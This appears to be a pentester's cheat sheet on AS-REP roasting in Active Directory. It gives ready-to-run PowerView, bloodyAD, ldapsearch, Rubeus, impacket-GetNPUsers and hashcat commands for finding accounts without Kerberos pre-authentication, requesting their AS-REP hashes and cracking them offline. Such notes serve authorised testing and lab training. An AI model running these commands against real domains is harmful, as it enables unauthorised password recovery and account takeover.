👾 Overview
If an account has "Do not require Kerberos preauthentication" set, the KDC will answer an AS-REQ for that user without any proof of the password. The AS-REP it returns contains a part encrypted with a key derived from the user's password, so it can be taken offline and cracked to recover that password.
🔍 Discovery
Requirements:
- a connection to the DC
- Lack of Kerberos pre-authentication
- Domain account - optional but preferred
If attempting the attack unauthenticated, you need a list of valid usernames to try. In labs such as HTB this is worth doing whenever employee names can be harvested from a website or similar; username-anarchy is a good tool for turning those names into candidate username formats. The DC's error for an unknown principal differs from the one for a user that requires pre-auth, so the same request also tells you which guessed usernames exist.
If authenticated, you can enumerate vulnerable users (those that don't have Kerberos pre-authentication required) from LDAP:
Windows:
# Using PowerView
Get-DomainUser -PreauthNotRequired -verbose
Linux:
# Using bloodyAD
bloodyAD -u [username] -p '[password]' -d [domain] --host [ip] get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
# Using ldapsearch (a simple bind needs a UPN or DN, not a bare sAMAccountName).
# Unlike the bloodyAD filter above, this one does not exclude disabled accounts.
ldapsearch -x -LLL -H ldap://[ip] -D "[username]@[domain]" -w '[password]' \
  -b "[basedn]" \
  "(&(objectClass=user)(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \
  sAMAccountName
📌 Exploitation
Windows:
# Using Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.hash
Linux:
# With a list of users
impacket-GetNPUsers [DOMAIN]/ -usersfile user.list -format hashcat -outputfile asrep.hash -dc-ip [IP]
# With domain credentials - will automatically find targets
impacket-GetNPUsers [DOMAIN]/[USERNAME]:[PASSWORD] -request -format hashcat -outputfile asrep.hash
# With LDAP anonymous bind - will automatically find targets
impacket-GetNPUsers [DOMAIN]/ -format hashcat -outputfile asrep.hash -dc-ip [IP]
If you encounter a Kerberos clock skew error (KRB_AP_ERR_SKEW), the usual fix is to synchronise your clock with the DC and retry: by default the KDC rejects requests whose timestamp is more than five minutes off its own time.
✨ Post-Exploitation
Once an AS-REP hash is obtained, it can be cracked offline with hashcat to obtain the user's password. Mode 18200 is the RC4-HMAC (etype 23) AS-REP mode, which is what the lines written by GetNPUsers and Rubeus above are in by default (they start with $krb5asrep$23$); if the DC returned an AES-encrypted AS-REP instead, the etype field will read 17 or 18 and hashcat needs the matching AES AS-REP mode, which recent versions provide.
# Simple dictionary attack
hashcat -a 0 -m 18200 asrep.hash [wordlist]